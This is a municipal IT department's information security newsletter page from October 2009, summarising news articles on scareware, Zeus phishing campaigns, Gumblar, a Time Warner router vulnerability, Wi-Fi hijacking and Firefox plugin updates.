Working for a safe, affordable, vibrant, innovative, and interconnected city.
Learn More Home Page This Department
Link to DoIT Home Page Link to DoIT Home Page Link to DoIT About Us Page Link to DoIT Contact Us Page
We make technology work for the City Michael Mattmiller, Acting Chief Technology Officer
Information Security Home Page
Chief Information Security Officer
Information Security Bulletins
Information Security Newsletter
Information Systems Security Policy
Spams and Scams
Creating Passwords
Securing Your Laptop
Protecting Your Home
Spyware Solutions
Wireless Network Security Solutions
Digital Consumer
Living Digital
Contact Us
Glossary of IT Terms

Information Security Newsletter

Bulletins posted 10/22/2009

Kanye West death prank used to sling scareware

But Beyonce had one of the best hoaxes of all time

Rumours of the death of rapper Kanye West in a car crash became fodder for fake anti-malware scams on Tuesday

Users searching for more info on the fictitious fatality are liable to get redirected to sites distributing scareware, security researchers warn. The rumour itself reportedly originated on notorious image board 4chan, the seeding ground for the Anonymous campaign against Scientology.

Bogus reports, claiming West met his maker in a crash involving two luxury cars in Los Angeles, subsequently appeared in email as well as appearing on social network sites such as Facebook and Twitter.

These reports didn't themselves point to malware-infested sites but made the topic of West's supposed demise a trending topic on Twitter and elsewhere.

Unsavoury characters latched onto this to poison search results related to the rapper's fictitious James Dean-style death.

The incident is yet another example of hackers gaming search engine rankings for events in the news to expose the unwary to fake anti-malware scams.

Other recent campaigns along the same lines have hopped aboard the news of the death of Michael Jackson and the recent launch of Google Wave, among many others. It seems almost inevitable that the imminent launch of Windows 7 will also be used to throw out scareware.

If you have fallen for this scam, notify your service desk immediately and change your passwords. -By John Leyden

4 Tips for Writing a Great Social Media Security Policy

Security researchers at IANS think social media policies provide security departments with a great opportunity.

  • 1. Don't start from scratch
  • The media landscape is so dynamic that if you create policy for today's hot technology, tomorrow it will be obscure. Instead, said Phillips, use this as an opportunity to draw attention to existing policies.

  • 2. Use social media policies to raise security awareness
  • For instance, when compliance regulations came into play, savvy security teams were able to create new policies to comply, while also letting employees know why they were important.

  • 3. Use social media access to raise security's positive profile within the organization
  • While the initial security reaction to new media is often to block, Phillips said most organization now need to consider that not only may allowing access be necessary, but also useful from an info sec perspective.

  • 4. Be prepared for the next phase
  • As social media platforms come and go, some will ultimately become commonplace and integral to an enterprise. While creating entire new policies around social media doesn't make sense right now, at some point, said Phillips, it will become necessary for policies to be more specific.

    For further information on how to set this up yourself, Please see full article.

    CSO -By Joan Goodchild

    Gaping Security Hole Turns Cable Modems Into Hacker Prey

    A blogger helping to tune a friend's wi-fi network uncovered a gaping security hole in Wi-Fi cable modem routers installed in 64,000 Time Warner subscribers' homes, leaving them open to attack

    Time Warner says that within the past week it has patched the problem until the manufacturer can provide a permanent fix, but before that it had allowed administrative access to the routers. Attackers could then run a variety of programs against these routers, says David Chen in his blog Chenosaurus.

    Because the vulnerability let anyone anywhere on the Internet take over control of the router, they could launch attacks from within Time Warner customers' homes.

    "From within your own network, an intruder can eavesdrop on sensitive data being sent over the Internet and even worse, they can manipulate the DNS address to point trusted sites to malicious servers to perform man-in-the-middle attacks," Chen writes. "Someone skilled enough can possibly even modify and install a new firmware onto the router, which can then automatically scan and infect other routers automatically."

    Chen says he discovered that administrative control of the routers had been blocked by a Java script. He disabled Java on his friend's router and had access to all the router's settings. He opened the backup configuration file and discovered the administrative login and password in plaintext.

    Chen also notes that the router allows only Wired Equivalent Privacy encryption, which he says is readily broken, allowing anyone who can break WEP access to the network. He also says the fixed format for the routers' SSIDs makes it possible to figure out which Wi-Fi networks are run by SMC 8014s.

    To find out more information please see full article. If you have fallen for this scam, notify your service desk immediately and change your passwords.

    Network World -Tim Greene

    Best Practices for Verifying and Cleaning up a Compromised Site

    It's not always clear to webmasters how to go about cleaning up their sites once they've been compromised, so this time we thought we'd share some best practices.

  • 1) Verify Your Site with Google Webmaster Tools
  • If you have added and verified your site's ownership with Google Webmaster Tools, you can view a partial list of URLs where our system has detected suspicious content on your site, as well as samples of the malicious code. Once you've thoroughly cleaned up your site and addressed the vulnerability that allowed it to be compromised, it's easy to request a review through Webmaster Tools.

  • 2) If Your Site Has Been Compromised, Perform a Comprehensive Cleanup
  • If any part of your site has been compromised, thoroughly check all pages on the site for harmful code or content not just the example pages listed in Webmaster Tools. Be sure to identify and address the underlying vulnerability that led to the compromise, or else reinfection is likely to occur.

    Deleted & Error Pages: Dark Corners of Your Website Where Malware May Be Lurking

    When a page is deleted from a site, the web server returns an error code (usually 404: Not Found) when requests to the "deleted" URLs are made. In addition to the error code in the HTTP header, the web server may send a custom error page or "Not Found" page, usually intended to help users find what they are looking for. If your site is infected, its error page can contain arbitrary HTML that exposes your visitors to malware.

  • 3) If You Switch Hosting Providers, Disable Access to the Old Version of Your Site
  • When a site is moved to a different hosting provider, the DNS records are updated such that the domain name points to a new IP address. In some cases, DNS caching can cause your domain name to continue resolving to the old IP address for some visitors even after the site has moved.

    For this reason, we recommend instructing your former hosting provider to stop serving any content for your site. This may cause some visitors to experience server errors for a few hours, but can protect them from visiting a potentially dangerous web server

    For further information on how to try this up yourself, Please see full article.

    Security Team -By Panayiotis Mavrommatis

    Bulletins posted 10/21/2009

    Consumers should clean up their act on personal security

    The growing use of social networking sites is leaving PC inadvertently open to identity thieves warned Hugh Thompson, chief security strategist at People Security.

    Speaking at the RSA Europe Conference, Thompson said that people were unaware just how many clues they left for fraudsters. He said such carelessness was fuelling the rise of cybercrime.

    He told the conference about the way he managed to access one of his wife's friend's bank account in a couple of hours using publicly available data - a process that he had previously documented in a Scientific American article.

    He warned that most people's private accounts could be accessed in this way.

    He identified three types of ways in which public data could be misused: direct use, where public data is converted; and what he called "amplification gateway data" where public data is converted to private data by using additional data.

    "For example," said Thompson, "fraudsters using the first four numbers of a credit card number to extract the remaining numbers."

    The third technique was drawing on collective intelligence and correlating publicly available information, as an example, he cited the appearance of 10 senior executives all seeking recommendations on LinkedIn at the same time -

    "if you see one manager, that tells you that someone's job-hunting, 10 tells you something about the company - perhaps it's in trouble, perhaps there's going to be a takeover"

    Thompson exhorted delegates to carry out their own self-hygiene tests. "Spend an hour on Google searching your own name and see what information is available. Old resumes are particular wealth of information.

    He said that the 'reset your password' facility was also a security weakness, pointing out the way that Sarah Palin's webmail account was subverted last year was by resetting the password through the use of publicly available information,

    He pointed out that users should take on greater responsibility to help reduce cybercrime. He said that consumers should look beyond traditional security measures and be aware of the amount of information that they were leaving scattered in cyberspace.

    If you have fallen for this scam, notify your service desk immediately and change your passwords.

    TechWorld -By Maxwell Cooter

    Two out of five at risk from Wi-Fi hijacking

    Two out of five web users are at risk of having their Wi-Fi connection hijacked, says TalkTalk.

    Research by the ISP revealed that five percent of internet connections have no security whatsoever, while 36 percent use WEP, which TalkTalk says is easily hackable.

    Only three percent of broadband connections in the UK use the most secure form of protection, WPA2.

    The ISP is concerned that under new proposals to tackle internet piracy, which are currently being heavily-backed by Business Secretary Lord Mandelson,

    many Brits could find themselves accused of illegal file-sharing and banned from the web, even a cybercriminal hijacked their Wi-Fi connection to illegally share files.

    With this in mind TalkTalk has launched a campaign that aims to ensure Brits aren't disconnected without a trial.

    Don't Disconnect Us sets out three major objections to Lord Mandelson's plans; that it by-passes the courts and gives rightsholders quasi-judicial powers,

    it exposes millions of people to false prosecution since it is based on 'guilty until proven innocent'.

    Finally, TalkTalk says it will do little to tackle illegal filesharing since the main offenders will use Wi-Fi hijacking in a bid to avoid detection.

    The Don't Disconnect Us website will also allow web users to discover the latest views on tackling illegal filesharing from around the world, a link to a petition on the No 10 website where opposition to the plans can be registered and a forum to discuss the issue

    "There is a lot of opposition to Lord Mandelson's plans on filesharing but there is no single online forum which draws all that opposition together. That is the purpose of Don't Disconnect Us.

    But we also want to hear from peope who think we're wrong so we can have a full and frank exchange of views," a TalkTalk spokesman said.

    For more details on how to protect yourself please see full article.

    PC Advisor UK -By Carrie-ann Skinner

    Time Warner Cable Exposes 65,000 Customer Routers to Remote Hacks

    A vulnerability in a Time Warner cable modem and Wi-Fi router deployed to 65,000 customers would allow a hacker to remotely access the devices administrative menu over the internet, and potentially change the settings to intercept traffic, according to a blogger who discovered the issue.

    Time Warner acknowledged the problem to Threat Level on Tuesday, and says its in the process of testing replacement firmware code from the router manufacturer, which it plans to push out to customers soon.

    The vulnerability lies with Time Warners SMC8014 series cable modem/Wi-Fi router combo, made by SMC. The device is one of several options Time Warner offers to customers who dont want to install their own modem and router to use with the companys broadband service.

    The device is installed with default configurations, which customers can alter only slightly through its built-in web server. The most customers can do through this page is add a list of URLs they want their router to block.

    The attacker would need the routers IP address to conduct the attack. But Chen found a dozen customer SMC8014 series cable modem/Wi-Fi routers by simply running a port scan on a subnet of 255 Time Warner IP addresses.

    An evil hacker could easily automate a scanning tool to sweep through Time Warners address space and hack every SMC8014 it finds.

    From within your own network, an intruder can eavesdrop on sensitive data being sent over the internet and even worse, they can manipulate the DNS address to point trusted sites to malicious servers to perform man-in-the-middle attacks, Chen wrote on his blog.

    Someone skilled enough can possibly even modify and install a new firmware onto the router, which can then automatically scan and infect other routers automatically.

    For more details on how to protect yourself please see full article.If you have fallen for this scam, notify your service desk immediately and change your passwords. -By Kim Zetter

    Bulletins posted 10/20/2009

    Botnet Unleashes Variety Of New Phishing Attacks

    Attackers use phony messages of system upgrades, Outlook updates, and Microsoft Conficker 'cleanup tool' to spread malware

    The massive Zbot botnet that spreads the treacherous Zeus banking Trojan has been launching a wave of relatively convincing phishing attacks during the past few days -- the most recent of which is a phony warning of a mass Conficker infection from Microsoft that comes with a free "cleanup tool."

    The wave of attacks began early last week targeting corporations in the form of email messages that alerted victims of a "system upgrade."

    Email is accompanied by poisoned attachments and links; in some cases it poses as a message from victims' IT departments, including their actual email domains, and alerts them about a "security upgrade" to their email accounts.

    The message then refers victims to a link to reset their mailbox accounts, and the link takes them to a site that looks a lot like an Outlook Web Access (OWA) page (PDF), but instead infects them with the Zeus Trojan.

    The Zbot botnet, which is made up of 3.6 million PCs in the U.S., or 1 percent of all PCs in the country, according to data from Damballa, spreads the deadly Zeus Trojan.

    Zeus, which steals users' online financial credentials, represents 44 percent of all financial malware infections today, according to Trusteer.

    The Outlook attack was the first large-scale Zeus attack against the corporate world, he says, which signals a new strategy for Zbot.

    "Shifting its focus there makes a lot of sense for financial malware because the typical credentials you can steal from the corporate world are worth a lot more money than credit cards and accounts in the consumer world.

    To own the company's accountant or finance department's bank account credentials would be a lot more profitable," Klein says.

    Zeus traditionally has been one of the more difficult malware variants for some antivirus programs to detect: According to recent data from Trusteer, Zeus is detected only 23 percent of the time by up-to-date antivirus applications.

    It's also hard to kill because it hides itself so well in the operating system.

    If you have fallen for this scam, notify your service desk immediately and change your passwords.

    DarkReading -By Kelly Jackson Higgins

    Fake 'Conficker.B Infection Alert' spam campaign drops scareware

    An ongoing spam campaign is once again attempting to impersonate Microsofts security team

    The use of email as propagation vector for scareware campaigns (The ultimate guide to scareware protection), and in particular the use of email attachments is an uncommon practice,

    compared to the single most effective way of hijacking traffic through blackhat search engine optimization where the cybercriminals rely on real-time news events.

    The campaign is an example of a thankfully - badly executed one in the sense that with Microsofts Security Essentials recently gained momentum, even the average Internet user would notice the suspicious timing of the offered antispyware program.

    • Example of email:

    Dear Microsoft Customer,

    Starting 18/10/2009 the Conficker worm began infecting Microsoft customers unusually rapidly. Microsoft has been advised by your Internet provider that your network is infected. To counteract further spread we advise removing the infection using an antispyware program. We are supplying all effected Windows Users with a free system scan in order to clean any files infected by the virus.

    Please install attached file to start the scan. The process takes under a minute and will prevent your files from being compromised. We appreciate your prompt cooperation.


    Microsoft Windows Agent #2 (Hollis)

    Microsoft Windows Computer Safety Division

    If you have fallen for this scam, notify your service desk immediately and change your passwords. -By Dancho Danchev

    Gumblar Trojan drive-by exploits spike following Adobe update

    The Gumblar Trojan, responsible for stealing thousands of website FTP credentials earlier this year has returned, according to researchers, this time seeking out users who failed to deploy patches released last week by Adobe Systems Inc.

    The malware exploit is spreading via legitimate websites, according to IBM's X-Force security team.

    It finds a way in by targeting website vulnerabilities, injecting code into pages that is designed to trip up visitors in drive-by attacks.

    The result is an increase in malicious PDF files.

    IBM said Gumblar activity increased shortly after Adobe released an update patching 34 vulnerabilities, some critical to both its popular Adobe Reader and Acrobat PDF viewing software.

    A considerable increase in malicious PDF files was detected by IBM honeypots on Monday, passing a PDF exploit targeting Adobe Flash and also checking for unpatched vulnerabilities in Microsoft Office Web Components.

    "All of these attacks are very recent and effective at compromising the client-side victim in an effort to propagate their malicious payload worldwide," the researchers wrote in a posting on the IBM X-Force Frequency X blog.

    The researchers noted that Gumblar is likely continuing to use stolen FTP password credentials to compromise websites and set up its drive-by attack campaign.

    Security researchers noted in June that Gumblar harvested as many as 80,000 FTP passwords at the time. Victims infected with malware through the attacks are often hit with password-stealing malware.

    Gumblar is also known as Gumblar Martuz, because the cybercriminals behind the attacks switched from China-based malicious domains to Martuz, domains based in the U.K.

    The cybercriminals behind the malware exploit have slightly changed their method of infection. Once a hole is discovered in a website, malicious scripts and payloads are hosted directly on the compromised host.

    The previous Gumblar variant used a remote server to host the payload and malicious scripts, the IBM researchers said.

    The U.S. Computer Emergency Response Team (US-CERT) issued an advisory in May warning about the dangers posed by Gumblar.

    In it, US-CERT warned enterprises and consumers to install the latest updates for various Web applications, including Flash Player and Adobe Reader.

    The good news is that IBM endpoint and network intrusion prevention systems, as well as Symantec Corp. and other antivirus vendors, are blocking malware that attempts to exploit the known Web application vulnerabilities.

    If you have fallen for this scam, notify your service desk immediately and change your passwords. -By Robert Westervelt

    Two ways to download software updates in Snow Leopard

    When running Software Update in OS X 10.5 and earlier, you could choose to download available Software Updates, instead of installing them.

    To do so, you could just select Update -> Download Only after the list of available updates appeared. In 10.6, this menu item is gone, as is Install and Keep Package, which appeared in the same menu.

    The obvious choice is a new entry in the Update menu in Software Udpate: Go to Apple Downloads Page.

    On the Apple Downloads page, youll findin theoryevery software update that Apple releases, each of which can be downloaded and saved on your Mac.

    Downloading a number of updates one by one can be a bit of a chore, though.

    The other alternative is to use the softwareupdate program in Terminal, which still has a download option available in 10.6. In Terminal, type softwareupdate -d (then press Return) to launch the softwareupdate tool in download mode.

    Unlike using your browser, this command will download all available updates at once, and will do so without requiring your admin password.

    Let the program run, and when its done (the Terminals command prompt will return), youll find the downloaded updates in the top-level Library -> Updates folder. From there, you can install them, or copy them to other Macs for future installation.

    For more detailed instructions, please see full article. -By Rob Griffiths

    Save Printer Ink by Choosing an Ink-Saving Font

    This is not security related, but we thought it was a good tip and worth posting because it can save you some money.

    Is there such a thing as a "green" font? There is, and it's called, aptly enough, Ecofont. It's free, and it's fabulous.

    You can configure your printer driver to print two pages on one piece of paper. You can turn on "draft" mode for lighter output and less ink consumpton. And, my favorite: bypass printing altogether and generate PDFs.

    Now there's another option, one that combats excessive ink consumption at the font level: Ecofont, a free typeface that promises to reduce ink use by up to 20 percent.

    Ecofont looks a lot like regular old Arial, but with one key difference: holes. Each letter has lots of little holes punched out of it, meaning it requires less ink to print.

    Thankfully, Ecofont is still very readable. So you can use it for your everyday print jobs, switching to a regular font only when absolutely necessary.

    Obviously there are lots of outline-style fonts that would accomplish more or less the same thing. But most of them are fancy, showy typefaces--not many look like everyday Arial

    To get a link to Ecofont or for more detailed information on how this can save you money, please see full article.

    PC World -By Rick Broida

    Bulletins posted 10/19/2009

    How hackers find your weak spots

    A look at some of the ways hackers use social networking tools to gain access to victims' systems

    While there are an infinite number of social engineering exploits, typical ones include the following:

    • Stealing passwords:

    In this common maneuver, the hacker uses information from a social networking profile to guess a victim's password reminder question.

    • Friending:

    In this scenario, a hacker gains the trust of an individual or group and then gets them to click on links or attachments that contain malware that introduces a threat, such as the ability to exploit a weakness in a corporate system.

    For example, says Netragard CTO Adriel Desautels, he might strike up an online conversation about fishing and then send a photo of a boat he's thinking of buying.

    • Impersonation/social network squatting:

    In this case, the hacker tweets you, friends you or otherwise contacts you online using the name of someone you know.

    Then he asks you to do him a favor, like sending him a spreadsheet or giving him data from "the office.

    • Posing as an insider:

    Imagine all the information you could extract from an unknowing employee if you posed as an IT help desk worker or contractor.

    On the Netragard blog, he describes an exploit in which a Netragard worker posed as a contractor, befriended a group of the client's workers and set up a successful phishing scheme through which he gleaned employee credentials, eventually gaining entry to the entire corporate infrastructure.

    For further information on how to protect yourself, Please see full article. -By Mary Brandel

    Spam Strangles YouTube

    A prediction two years ago by IT security solutions firm Kaspersky Lab on the possible use of YouTube as a medium for disseminating spam has finally been fulfilled.

    Kaspersky Lab's Content Filtering Research group recorded a mass mailing that contained a link directing users to a video advert on YouTube.

    There were several message variations in the mass mailing, but they all included the same link to YouTube.

    Due to its worldwide popularity, YouTube is a potentially attractive resource for distributing spam, Kaspersky Lab said.

    Last April, messages were detected that contained nonstandard, complex images advertising spammer services.

    Noise techniques have also been applied to graphical files, causing problems for spam filters.

    Kaspersky Lab reminded on how important it is for users to keep spam filters turned on in order to block unwanted or potentially hazardous correspondence.

    The spam filter training option in the company's products should also be utilized to constantly improve protection against all types of unsolicited mass mailings.

    Becareful when downloading on YouTube and if you have fallen for this scam, notify your service desk immediately and change your passwords.

    Computerworld Philippines -By Tom S. Noda

    Aggressive tactics used in new distribution and installation of fake anti-virus software

    PandaLabs has identified a new and aggressive trend for selling fake anti-virus software

    It claimed that in comparison to previous campaigns, where users would typically see a series of warnings prompting them to buy a version of the program, the new technologies are being combined with ransomware, hijacking the computer and rendering it useless until victims complete the purchase.

    The fake program, called Total Security 2009, is offered for 74.50. Victims are also offered premium' tech support services for an additional 18.60.

    Users who the ransom will receive a serial number, which, when entered in the application, will release all files and executables, allowing them to work normally and recover their information. The fake anti-virus however, will remain on the system.

    Luis Corrons, technical director of PandaLabs, said: The way this rogueware operates presents a dual risk: firstly, users are tricked into paying money simply in order to use their computers; and secondly, these same users may believe that they have a genuine anti-virus installed on the computer, thereby leaving the system unprotected.

    Users are often infected unknowingly, in most cases, through visiting hacked websites, and once a computer is infected it is extremely difficult to eliminate the threat, even for those with a certain degree of technical knowledge.

    Users are also prevented from using any type of detection or disinfection tool, as all programs are blocked.

    Corrons claimed that once a computer is infected, any attempt made by the user to run a program or open a document will be unsuccessful, and the only response from the computer will be to display a message falsely informing the victim that all files are infected with the only solution being to buy the fake anti-virus.

    He also said that the only application that can be used is the internet browser, conveniently allowing the victim to pay for the fake anti-virus.

    "PandaLabs has published the serial numbers required to unblock the computer if it has been hijacked on its blog. "Users can then install genuine security software to scan the computer in-depth and eliminate all traces of this fake anti-virus,"" -By Dan Raywood

    Symantec calls 'SpywareGuard' and 'AntiVirus' top scareware threats

    Fake security software "SpywareGuard" and "AntiVirus" are said to be the top two scareware programs out of about 250 fake security programs detected, according to a Symantec report.

    Symantec examined evidence of what it could detect online for a six-month period, how it was propagating, and what fake security software programs were costing, says Mark Fossi, editor of the report. "Sometimes its sold as a complete security suite," he said, adding, "it mostly does nothing."

    Rogue security software is often called scareware because these fake antivirus and registry cleaners can convince the victim to purchase based on flagging screens warning them about threats that don't exist outside the scareware itself.

    According to the Symantec report: "There are two prevalent ways in which rogue security software can be installed on a user's computer; either it is downloaded and installed manually by a user after he or she has been tricked into delivering the software as legitimate, or it is knowingly installed onto a user's computer, such as when a user visits a malicious Web site designed to automatically download and install illegitimate applications."

    Some scams even return e-mail messages to the victim with a receipt for purchase that includes a serial number and a valid functioning customer-service phone number.

    Customers often pay for scareware with credit cards, and the report notes, "Since the payment services used are often legitimate, there is constant threat that the payment services provider will discover that its service is used for fraud."

    But "scammers also benefit from phishing personal information for users who register rogue applications." This could include the credit card number and payment details that can be sold into the underground economy for further abuse.

    If you have fallen for this scam, notify your service desk immediately and change your passwords.

    Network World -By Ellen Messmer

    Fake Antivirus Attacks, Demands Ransom

    The fake antivirus phenomenon has taken an unpleasant turn with the discovery of a Windows program that not only cons users into buying an unnecessary license but appears to lock files and applications on the victim's PC.

    According to security company Panda Security, rogueware program Total Security 2009 starts out in conventional fashion with the 'discovery' of a non-existent malware infection for which it demands an unusually ambitious $79.95 (50), and even has the cheek to ask a further $19.95 for 'premium' technical support.

    Users deciding against purchasing the license find that all files and applications on their PC have been designated as 'infected' and made inaccessible until the user follows on-screen instructions to buy a license using the only working application, Internet Explorer.

    According to Panda Security, the technique used to block access involves simple interception of Windows calls to open files and applications, closing them before they can open. Sophisticated techniques such as file encryption are not needed.

    The bogus program would get on to a user's PC in the first place after they had either clicked on a link in a spam email, or by visiting an infected distribution website, or even by visiting the program's convincing-looking product homepage. Once registered, Total security 2009 remains on the system.

    Specifically, criminals will generate a new undetected sample on the fly and then distribute it to users. Knowing that the AV companies will detect it shortly, the criminals force users into purchasing the rogueware before the signature detection can kick in to remove it," said Corrons.

    In the last year, fake antivirus programs have become possibly the biggest money-making scam on the Internet after spam marketing, even managing to find distribution on false pretences through premium Internet sites such as The New York Times.

    There is growing evidence that many genuine antivirus programs don't detect some of these scam programs, which might also be a reason behind their success.

    For more information please see full article. If you have fallen for this scam, notify your service desk immediately and change your passwords. -John E. Dunn

    Bulletins posted 10/16/2009

    Phishing attacks with Zeus Trojan targeting Outlook Webmail shops

    Phishing E-mails attempt to fool Microsoft Outlook Web Access users at enterprises.

    Targeted phishing attacks aimed at getting Outlook Web Access users within enterprise organizations to download a Trojan designed to steal financial and account information is spreading fast

    It started yesterday, with more than 50 customers of ours receiving this e-mail and we've been targeted ourselves," says Mickey Boodaei, CEO of security firm Trusteer.

    The e-mail-based attack is customized to fool employees in each enterprise it's sent to, with the "from" address appearing to come from within the enterprise, asking the recipient on behalf of the systems administrator to modify their e-mail settings for Outlook Webmail as a result of an upgrade.

    Though the link appears to be to the enterprise Outlook Web Access site, it's actually a Web site in Chile, Columbia, Romania or Russia that's craftily trying to get the victim to download a file that's the dangerous Zeus/Zbot Trojan, says Boodaei.

    The Zeus Trojan is well-knownit's part of the fake IRS web site e-mail scam sweeping into mailboxes at present.

    Using an isolated computer, Trusteer downloaded the Zeus Trojan to see how it would work in the case of these phishing messages and found the attack involves keeping track of what everyone who receives it might do.

    "It even sends a follow-up e-mail that says "you didn't complete the process,'" Boodaei notes.

    Trusteer points out that warding off this type of attack against employees entails educating them about phishing and blocking download of executable and zip files from the Web.

    If you have fallen for this scam, notify your service desk immediately and change your passwords.

    Network World -By Ellen Messmer

    Gumblar botnet awakens after five months to distribute malware

    The Gumblar botnet has begun to be seen again five months after it rose to prominence.

    Mary Landesman, senior security researcher at ScanSafe, claimed that after it built a botnet of compromised websites in May, it is now using those compromised websites as hosts for its malware.

    Landesman said: In a typical outbreak situation, there are compromised websites that act as a conduit for malware hosted on an attacker owned site.

    But in this case, the malware resides on thousands of legitimate (but compromised) websites.

    The majority of the compromised websites are small mom and pop style websites in non-English speaking countries, but that's not important because the attackers have a clever trick for driving traffic directly to the malware hosted on those sites.

    An iframe pointing to the malicious script on the compromised site is forcibly injected on various forums.

    The injected forums we've seen thus far are using feed aggregators to push their forum posts out to subscribers, who are then exposed to the iframe.

    Landesman further claimed that the malicious script (which contains certain unique components included in the first stage Gumblar attacks), checks for the version of Adobe Reader and Adobe Flash and delivers the same URL with a unique SID depending on those results.

    The script also contains an exploit for the Microsoft Office Web Components vulnerability described in MS09-043, which was patched in August 2009. Successful exploit results in a randomly named file dropped to the system.

    This causes the malware to load when any sound-enabled application, i.e. any browser, is launched. The malware also takes a read of sqlsodbc.chm, a file targeted by previous Gumblar-delivered malware, said Landesman.

    ScanSafe claimed that signature detection of the malware is very low according to a VirusTotal report.

    If you have fallen for this scam, notify your service desk immediately and change your passwords. -By Dan Raywood

    Hacked Facebook Apps Lead to Fake Antivirus Software

    New applications are turning up on Facebook. Unfortunately, some of them are fake antivirus programs.

    While researching Web sites that host malicious software, Roger Thompson, chief research officer of software security company AVG, noticed something funny.

    A Russian Web site known for hosting malware was getting lots of referrals from Facebook.

    On further investigation, Thompson found the referrals were coming from a Facebook application called "City Fire Department," a game where multiple players respond to emergency calls.

    The application had been modified to deliver an iframe, which is a way to bring content from one Web site into another.

    The iframe serves up code that tries to exploit vulnerabilities in a PC's software. If it finds one -- a process that happens nearly instantly -- it then downloads a fake antivirus program called Antivirus Pro 2010.

    Thompson posted screenshots on AVG's blog.

    Bogus antivirus programs have been around for a long time, but they've become an increasing nuisance this year as those who create them seemed to have stepped up their game.

    When installed on computers, the programs nag users to buy them. The applications, which can cost upwards of US$60, are generally useless against real security threats.

    Thompson thought the people who wrote City Fire Department might be behind the scam. But the malicious code was actually hosted on Facebook, which led Thompson to theorize that the developers of City Fire Department inadvertently had their Facebook passwords obtained by a hacker, after which the application was modified.

    "The application has been taken offline until we can resolve all issues," according to the post. "We understand the frustration some users are feeling, and we will update with a timeline as soon as we can. Obviously, we would rather have a properly functioning game running instead of a half-working game."

    Three or four other applications had also been modified, Thompson said. Facebook can deactivate the applications until they are cleaned up. The situation also poses a danger to enterprises, who may allow their users access to Facebook through their firewall, thus opening a vector to deliver malware.

    If you have fallen for this scam, notify your service desk immediately and change your passwords.

    IDG News Service -By Jeremy Kirk

    Bugs & Fixes: Solving Safari cookie problems

    First off, the error message suggested that a cookie item named ac_history might be the proximate cause.

    I did find an ac_history cookie from listed in Safaris Show Cookies window (shown below). So I removed it. The errors vanished immediately, without even having to quit Safari.

    So far, so good. But within a short time, usually less than an hour, the symptoms returned. As did the problematic ac_history cookie. Clearly, this was not a permanent fix.

    Next, I tried deleting all cookies. The result remained the same: a temporary fix at best.

    Heres where things began to get a bit weird. I decided to delete all cookies.

    But rather than do this via Safari, with which I was rapidly losing faith, I went to ~/Library/Cookies and removed the Cookies.plist file from the folder, placing it on my Desktop.

    Heres the final surprise: Suppose you have two different Cookies.plist files: an older one saved from some earlier troubleshooting and a new active one currently in the Cookies folder.

    Say the older one is stocked full of cookies and weighs in at 2.3MB, while the newer one is practically empty at only 4KB. This is exactly the situation that I had at one point in my troubleshooting of this matter.

    Now, still with Safari running, trash the 4KB file and drag the the larger 2.3MB file to the Cookies folder. Within a second, the 2.3MB file drops to 4KB in size, as its data are replaced with those from the deleted file!

    Your 2.3 MB of cookie items are gone!

    Its easy to prevent this from happening. Just quit Safari before performing the swap. The next time you launch Safari, the replacement file will be active, with all its data intact.

    Still, its a surprise that the vanishing act can happen it all.

    For more detailed instructions or to try this yourself, please see full article. -By Ted Landau

    Mozilla will let rival browsers run Firefox security tool

    Plans to open new plug-in checker to users running other browsers.

    Mozilla plans to let people running rivals' browsers use Firefox's new plug-in update service, company officials said today.

    After a week of testing , Mozilla late Tuesday launched a Web-based service that checks for outdated Firefox plug-ins.

    The service, which relies on a Web page users must steer to manually, is part of the company's effort to prod people into upgrading potentially-vulnerable add-ons, such as Adobe Flash Player, which have become a major target for attackers.

    The check scans for installed plug-ins, identifies those for which updates are available and provides a link to the vendor's download site.

    Although the service currently works only in Firefox , a pair of Mozilla managers said that the company wants to open the plug-in check to other browsers.

    "Right now, this page only works with Firefox, but we care about all of you and we're working to support those of you on other browsers as well," said Asa Dotzler , Mozilla's director of community development, in a post to his blog yesterday.

    In fact, the service already detects plug-ins when the page is accessed by some browsers, such as Apple's Safari, although it isn't able to tell which plug-ins are outdated.

    However, other browsers, including Microsoft's market-leading Internet Explorer (IE), can't use the page: When IE8 reaches the check-in page, the message "No plugins were detected" appears.

    The plug-in check service detects more than a dozen different plug-ins, but isn't always able to tell whether one is outdated.

    Adobe's plug-in to render PDF documents within the browser, for example, was detected on a Computerworld system running Windows XP, but the checker said it couldn't sniff out the version number.

    Mozilla kicked off its campaign to eradicate out-of-date plug-ins last month, when it shipped a Firefox update that included detection for only Adobe Flash Player.

    Later, Mozilla said that the Flash check had prompted more than 10 million users to go to Adobe's Web site to download the newest version of Flash.

    For a link to the plug in service, please see full article.

    Computerworld -By Computerworld Staff

    Bulletins posted 10/15/2009

    Keep Your Firefox Plugins Up to Date

    A fast and easy Mozilla site makes it a snap to make sure your browser's Plugins (not extensions) are current.

    Firefox extensions (a.k.a. add-ons) get updated from time to time.

    As you may know, you can check for updates yourself by clicking Tools, Add-ons, Updates, or just wait for the browser to notify you (which it does automatically from time to time).

    Ah, but what about Plugins, which make it possible to open PDFs right in your browser, view Adobe Flash and Microsoft Silverlight videos, update your Google applications, and the like? Firefox doesn't do automatic update checks for Plugins (yet--one must assume that's in the works), but thanks to a new Mozilla site, you can run a check yourself.

    It's called, aptly enough, Plugin Check, and using it is as simple as visiting the site. In just a few seconds you'll see the results for all your Plugins.

    Hopefully they're all green, meaning "up to date," but you may see some that are yellow, meaning an update is required.

    No worries: Just click the corresponding Update button to download and install it.

    If the checker can't determine a particular Plugin's status, you'll get a gray Research button you can click to run a Google search.

    That's not particularly handy, but at least you can find your way to the Plugin creator's Web site.

    I'd recommend visiting Plugin Check once a month or so, just to make sure you're not running any outdated Plugins.

    For a link to "Plugin Check" please see full article.

    PC World -By Rick Broida

    Mozilla Delays Firefox 3.6 Beta

    Test build of the browser beta is available now, but the official beta won't arrive until next week.

    Instead of unleashing the Firefox 3.6 beta this week as planned, Mozilla released a "test build" of its browser to tantalize your taste buds for what's coming.

    An official release of the 3.6 beta is now set for October 21, one day before Windows 7 hits the streets -- possibly so users skip out on pre-installed Internet Explorer and go right for the good stuff.

    You can pick up your copy of the Firefox 3.6 beta test build on Mozilla's servers.

    Just select the operating system and processor platform you're using and grab the binary code.

    Remember that this isn't even a beta -- it's a test build of a beta -- so expect bugs.

    For a list of improvements included in the new version please see full article. -By Brennon Slattery

    Firefox 3.6 Beta 'Test Build' Available For Download

    Beta version of Firefox 3.6 now available for download

    Mozilla today released the first beta of the next iteration of their Firefox browser, version 3.6.

    Word broke earlier last week with details that 3.6, codenamed Namoroka, would finally be leaving Alpha status, and being made available for download ahead of the full stable release, which is currently expected to appear sometime next month.

